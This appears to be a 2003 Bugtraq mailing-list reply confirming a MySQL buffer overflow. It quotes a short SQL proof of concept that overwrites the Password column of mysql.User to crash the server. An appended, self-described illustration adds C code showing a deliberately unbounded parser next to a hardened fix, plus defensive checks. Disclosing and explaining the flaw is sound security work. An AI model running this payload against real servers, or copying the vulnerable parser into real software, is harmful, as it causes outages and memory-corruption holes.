[31583] in bugtraq


Re: Buffer overflow in MySQL

daemon@ATHENA.MIT.EDU (Konstantin Tsolov)
Fri Sep 12 18:44:13 2003

Content-Type: text/plain;
  charset="iso-8859-1"
From: Konstantin Tsolov <ktsolov@etel.bg>
To: bugtraq@securityfocus.com
Date: Thu, 11 Sep 2003 13:41:29 +0300
In-Reply-To: <20030910213018.GA5167@c9x.org>
MIME-Version: 1.0
Message-Id: <200309111341.29638.ktsolov@etel.bg>
Content-Transfer-Encoding: 8bit


Managed to replicate on 4.0.13 (custom made) running on slack8.1 with
mysql.mysql.

3.23.51 (the distro MySQL version) also proved vulnerable.

NB: just make sure you have a backup copy of your MySQL DB when testing this
harmless proof of concept on your production server :-)

> successful exploitation of that bug is trivial on some platforms. On most
> Linux systems the return address needs about 444 bytes to get overwritten.
>
>   Harmless proof of concept :
>   > USE mysql;
>   > ALTER TABLE User CHANGE COLUMN Password Password LONGTEXT;
>   > UPDATE User SET Password =
>
> '123456781234567812345678123456781234567812345678123456781234567812345678
>  123456781234567812345678123456781234567812345678123456781234567812345678
>  123456781234567812345678123456781234567812345678123456781234567812345678
>  12345678123456781234567812345678...' WHERE User = 'abcd';
>
>   > FLUSH PRIVILEGES;
>
>   [Connection lost]

-- 

"Talk is cheap because supply always exceeds demand."
		-- source unknown

+------------------------------------------------------+
| Konstantin Tsolov             ktsolov at etel dot bg |
| Systems Administrator - VoIP                         |
| eTel Ltd.                                www.etel.bg |
| Sofia, Bulgaria                                      |
+------------------------------------------------------+
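Added illustration (not the original post's code, and not MySQL's own source): the bug class the quoted proof of concept triggers is a fixed-size stack buffer filled from the mysql.User Password column with no length check, because the server relied on that column being a fixed-width CHAR. ALTER TABLE ... LONGTEXT removes the bound and FLUSH PRIVILEGES re-reads the row, so a value longer than the buffer walks over the saved return address (the "about 444 bytes" in the quoted report). The names parse_salt_unbounded, parse_salt_bounded, reload_users, the 16-digit sample hash and the sample rows are all constructed here; the real MySQL function and buffer names are not given on this page.

```c
/*
 * Constructed model of the overflow class behind the PoC: a grant-table
 * value parsed into a small stack array with no length check.  Names are
 * hypothetical and this is not MySQL's code.
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SALT_WORDS   2                 /* assume a 3.23-style hash: 2 x 32-bit words */
#define HASH_HEX_LEN (SALT_WORDS * 8)  /* = 16 hex digits */
#define POC_LEN      448               /* comfortably past the ~444 bytes the report cites */

/* Map one hex digit to its value; -1 for anything that is not a hex digit. */
static int hex_val(char c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* VULNERABLE pattern: no length check, because the caller "knows" the value
 * came from a CHAR(16) column.  Every extra 8 characters in `hash` write one
 * more word past the end of `salt`; with `salt` on the stack a long enough
 * value reaches the saved return address and the server dies, which is what
 * "[Connection lost]" in the PoC shows.  Only call with a well-formed hash. */
static void parse_salt_unbounded(uint32_t *salt, const char *hash)
{
    while (*hash) {
        uint32_t val = 0;
        for (int i = 0; i < 8; i++)
            val = (val << 4) | (uint32_t)hex_val(*hash++);
        *salt++ = val;
    }
}

/* HARDENED version: the stored value must be exactly HASH_HEX_LEN hex digits,
 * verified before anything is written, so the column type is never trusted.
 * Returns 0 on success, -1 if the value is too short, too long or not hex. */
static int parse_salt_bounded(uint32_t salt[SALT_WORDS], const char *hash)
{
    size_t n = 0;
    while (n <= HASH_HEX_LEN && hash[n] != '\0')  /* bounded scan: stop once too long */
        n++;
    if (n != HASH_HEX_LEN)
        return -1;
    for (size_t w = 0; w < SALT_WORDS; w++) {
        uint32_t val = 0;
        for (int i = 0; i < 8; i++) {
            int v = hex_val(hash[w * 8 + i]);
            if (v < 0)
                return -1;
            val = (val << 4) | (uint32_t)v;
        }
        salt[w] = val;
    }
    return 0;
}

/* Constructed stand-in for the mysql.User rows FLUSH PRIVILEGES re-reads. */
struct user_row { const char *user; const char *password; };

static char poc_password[POC_LEN + 1];

/* Build the PoC's oversized Password value ("12345678" repeated) at runtime. */
static const char *make_poc_password(void)
{
    for (size_t i = 0; i < POC_LEN; i++)
        poc_password[i] = "12345678"[i % 8];
    poc_password[POC_LEN] = '\0';
    return poc_password;
}

/* Reload every row with the bounded parser: malformed rows are logged and
 * skipped instead of being parsed into a stack buffer.  Returns the number
 * of rows rejected. */
static int reload_users(const struct user_row *rows, size_t nrows,
                        uint32_t out[][SALT_WORDS])
{
    int rejected = 0;
    for (size_t i = 0; i < nrows; i++) {
        if (parse_salt_bounded(out[i], rows[i].password) != 0) {
            fprintf(stderr, "skipping user '%s': malformed password hash (%zu bytes)\n",
                    rows[i].user, strlen(rows[i].password));
            rejected++;
        }
    }
    return rejected;
}

/* Worked run: one sane row plus the PoC's user 'abcd'; returns rows rejected. */
static int demo(void)
{
    struct user_row rows[2];
    uint32_t salts[2][SALT_WORDS];
    rows[0].user = "root"; rows[0].password = "5d2e19393cc5ef67"; /* constructed hash */
    rows[1].user = "abcd"; rows[1].password = make_poc_password();
    return reload_users(rows, 2, salts);
}

int main(void)
{
    uint32_t a[SALT_WORDS], b[SALT_WORDS];
    parse_salt_unbounded(a, "5d2e19393cc5ef67");
    parse_salt_bounded(b, "5d2e19393cc5ef67");
    printf("parsers agree on a sane hash: %s\n", memcmp(a, b, sizeof a) == 0 ? "yes" : "no");
    printf("rows rejected on reload: %d\n", demo());
    return 0;
}
```

Two practical points follow from the PoC itself. The attacker needs ALTER and UPDATE on mysql.User, so this is an escalation from MySQL root to code execution as the OS account mysqld runs under (the mysql.mysql the reply above mentions), not something an ordinary database user reaches. And on a server you did not build yourself, SHOW COLUMNS FROM mysql.user LIKE 'Password'; is a cheap sanity check: the Type should be a fixed-width CHAR, not LONGTEXT.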

